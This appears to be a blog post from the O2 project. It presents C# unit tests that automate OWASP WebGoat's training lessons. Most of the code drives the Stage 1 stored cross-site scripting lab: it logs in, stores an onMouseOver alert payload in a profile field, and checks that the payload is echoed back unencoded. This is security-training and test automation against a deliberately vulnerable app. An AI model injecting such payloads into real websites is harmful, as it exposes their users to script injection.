WebGoat – First Example of O2 WebGoat API
This script and video show a first example of the API that will be developed under O2 to automate WebGoat's functionality, lessons and exploits.
The WebGoat scripts are included in the local O2 Scripts folder and can also be seen here
Video: WebGoat – First Example of O2's WebGoat API
Source Code: unit tests from WebGoat_BlackBox_Exploits.cs
/// <summary>
/// Opens WebGoat's main page, checks that the word "WebGoat" is present in the
/// returned HTML and, if a "Start WebGoat" button is shown, clicks it.
/// </summary>
/// <returns>"ok" when the page loaded and the sanity assertion passed.</returns>
/// NOTE(review): unlike the other methods in this file this one carries no [Test]
/// attribute — confirm whether it is meant to be discovered as a test or only used as a helper.
public string Open_Main_Page()
{
    setup();
    webGoat.openMainPage();
    // Fail loudly if the landing page does not look like WebGoat at all
    // (wrong URL, proxy error page, login wall, ...).
    var landingPageHtml = ie.html();
    Assert.That(landingPageHtml.contains("WebGoat"), "Could not find the word WebGoat in the default page");
    var startButtonName = "Start WebGoat";
    if (ie.hasButton(startButtonName))
    {
        ie.button(startButtonName).flash().click();
    }
    return "ok";
}
/// <summary>
/// Runs the Stage 1 stored-XSS exploit against the "address1" profile field.
/// Named _OK, so this field is presumably the one WebGoat leaves unencoded and
/// the assertion inside <see cref="Exploit_Stage_1_Stored_XSS"/> is expected to pass.
/// </summary>
/// <returns>"ok" when the payload was echoed back unescaped.</returns>
[Test]
public string Exploit_Stage_1_Stored_XSS_OK()
{
    var targetField = "address1";
    return Exploit_Stage_1_Stored_XSS(targetField);
}
/// <summary>
/// Runs the Stage 1 stored-XSS exploit against the "description" profile field.
/// Named _Fail: presumably this field does not reflect the payload unescaped, so the
/// assertion inside <see cref="Exploit_Stage_1_Stored_XSS"/> is expected to trip.
/// </summary>
/// <returns>"ok" only if the payload was (unexpectedly) echoed back unescaped.</returns>
/// NOTE(review): a test that "passes" by failing its assertion is easy to misread in a
/// results list; an explicit negative assertion (payload NOT present) would express the
/// intent better — confirm the field's behaviour against WebGoat before changing it.
[Test]
public string Exploit_Stage_1_Stored_XSS_Fail()
{
    var targetField = "description";
    return Exploit_Stage_1_Stored_XSS(targetField);
}
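/// <summary>
/// Drives WebGoat's "LAB: Cross Site Scripting / Stage 1: Stored XSS" lesson:
/// navigates to the lab, logs in as "larry", selects the first entry of the second
/// select list, opens that profile for editing, writes an onMouseOver payload into
/// <paramref name="fieldToInsertPayload"/> and asserts that the raw handler text
/// comes back in the page after the update.
/// </summary>
/// <param name="fieldToInsertPayload">
/// Name of the profile form field that receives the payload (e.g. "address1").
/// </param>
/// <returns>"ok" if the payload was echoed back unescaped; otherwise the Assert throws.</returns>
private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
{
    setup();
    // Inside an event-handler attribute the "javascript:" prefix is just a label, so
    // alert('xss') fires when the stored link is hovered.
    var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
    webGoat.openMainPage();
    ie.link("Cross-Site Scripting (XSS)").flash().click();
    ie.link("LAB: Cross Site Scripting").flash().click();
    // NOTE(review): this link is only flashed, not clicked (Stage_1_Stored_XSS_Restart_Lesson
    // clicks it) — presumably the lab opens on Stage 1 by default; confirm.
    ie.link("Stage 1: Stored XSS").flash();
    ie.field("password").flash().value("larry");
    ie.button("Login").flash().click();
    // Positional selection: second <select> on the page, its first option.
    // Brittle if WebGoat's page layout changes.
    ie.selectLists()[1].options()[0].select().flash();
    ie.button("ViewProfile").flash().click();
    ie.button("EditProfile").flash().click();
    ie.field(fieldToInsertPayload).value(payload).flash();
    ie.button("UpdateProfile").flash().click();
    // Success indicator: the handler attribute appears verbatim, with its quotes NOT
    // HTML-encoded, i.e. the stored value was rendered without output encoding.
    // The browser may re-serialize the attribute name in a different case than the
    // payload used (the original check relied on IE lower-casing "onMouseOver"), so the
    // comparison is case-insensitive. This proves unencoded reflection only, not that
    // the script actually executed.
    var injectedHandler = "onmouseover=\"javascript:alert('xss')\"";
    var pageAfterUpdate = ie.html();
    Assert.That(pageAfterUpdate.IndexOf(injectedHandler, System.StringComparison.OrdinalIgnoreCase) >= 0,
                "Payload was not inserted into page");
    return "ok";
}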
/// <summary>
/// Navigates to "Stage 1: Stored XSS" and clicks "Restart this Lesson", so the
/// exploit tests can be re-run from a clean lesson state.
/// </summary>
/// <returns>"ok" once the restart link has been clicked.</returns>
[Test]
public string Stage_1_Stored_XSS_Restart_Lesson()
{
    setup();
    webGoat.openMainPage();
    // Same path as the exploit, except that the stage link and the restart link are clicked too.
    var linksToFollow = new[]
    {
        "Cross-Site Scripting (XSS)",
        "LAB: Cross Site Scripting",
        "Stage 1: Stored XSS",
        "Restart this Lesson"
    };
    foreach (var linkText in linksToFollow)
    {
        ie.link(linkText).flash().click();
    }
    return "ok";
}

